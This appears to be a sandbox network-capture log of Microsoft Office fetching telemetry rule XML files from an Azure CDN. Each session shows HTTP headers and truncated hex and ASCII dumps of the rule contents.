2024-10-30 02:46:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
67192.168.2.44982013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:45 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:45 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:45 GMT
Content-Type: text/xml
Content-Length: 416
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB5284CCE"
x-ms-request-id: 90a6b530-901e-007b-6be7-28ac50000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024645Z-r197bdfb6b4wmcgqdschtyp7yg00000007g00000000025ds
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session IDSource IPSource PortDestination IPDestination Port
68192.168.2.44982313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:45 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:45 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:45 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA740822"
x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024645Z-16849878b78z2wx67pvzz63kdg000000060g00000000eucr
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:45 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
69192.168.2.44982413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:45 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:45 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:45 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
ETag: "0x8DC582BB464F255"
x-ms-request-id: fe6c1954-001e-0082-5f6d-285880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024645Z-17c5cb586f626sn8grcgm1gf8000000005tg00000000h6k1
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
70192.168.2.44982513.107.246.454437268C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
TimestampBytes transferredDirectionData
2024-10-30 02:46:45 UTC219OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:46 UTC562INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:45 GMT
Content-Type: text/plain
Content-Length: 1112556
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public
Last-Modified: Mon, 28 Oct 2024 13:23:35 GMT
ETag: "0x8DCF753BA4743C2"
x-ms-request-id: 0dca9243-e01e-003c-7f0a-2ac70b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024645Z-16849878b78fkwcjkpn19c5dsn00000006hg0000000001p7
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:46 UTC15822INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
2024-10-30 02:46:46 UTC16384INData Raw: 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 41 75 74 68 6f 72 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
Data Ascii: false"> <S T="1" F="AuthorCount" /> </C> <T> <S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T
2024-10-30 02:46:46 UTC16384INData Raw: 6e 46 69 76 65 50 6c 75 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 53 55 4d 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54
Data Ascii: nFivePlusCount"> <A T="SUM"> <S T="1" F="11" /> </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T
2024-10-30 02:46:46 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
Data Ascii: </R> </O> </F> <F T="6"> <O T="AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R>
2024-10-30 02:46:46 UTC16384INData Raw: 74 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
Data Ascii: tVideo"> <C> <S T="25" /> </C> </C> <C T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C>
2024-10-30 02:46:46 UTC16384INData Raw: 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 39 30 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20
Data Ascii: > <S T="1" /> </T></R><$!#>10907v0+<?xml version="1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100"
2024-10-30 02:46:46 UTC16384INData Raw: 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 31 22 20 49 3d 22 44 61 69 6c 79 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d
Data Ascii: a="PSU" xmlns=""> <S> <TI T="1" I="Daily" /> <A T="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V=
2024-10-30 02:46:46 UTC16384INData Raw: 20 20 20 3c 55 54 53 20 54 3d 22 35 22 20 49 64 3d 22 62 75 6b 30 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20
Data Ascii: <UTS T="5" Id="buk0m" /> <F T="6"> <O T="EQ"> <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L>
2024-10-30 02:46:47 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f
Data Ascii: R> <V V="4" T="U32" /> </R> </O> </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </
2024-10-30 02:46:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d
Data Ascii: <L> <O T="EQ"> <L> <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L>


Session IDSource IPSource PortDestination IPDestination Port
71192.168.2.44982813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B984BF177"
x-ms-request-id: dc27e692-e01e-001f-1e67-281633000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-15b8d89586flzzksdx5d6q7g1000000002mg000000005hzd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:46 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
72192.168.2.44982713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6CF78C8"
x-ms-request-id: c82c03e6-f01e-001f-0cf2-245dc8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-15b8d89586f42m673h1quuee4s0000000bkg00000000534a
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
73192.168.2.44982613.107.246.45443
TimestampBytes transferredDirectionData
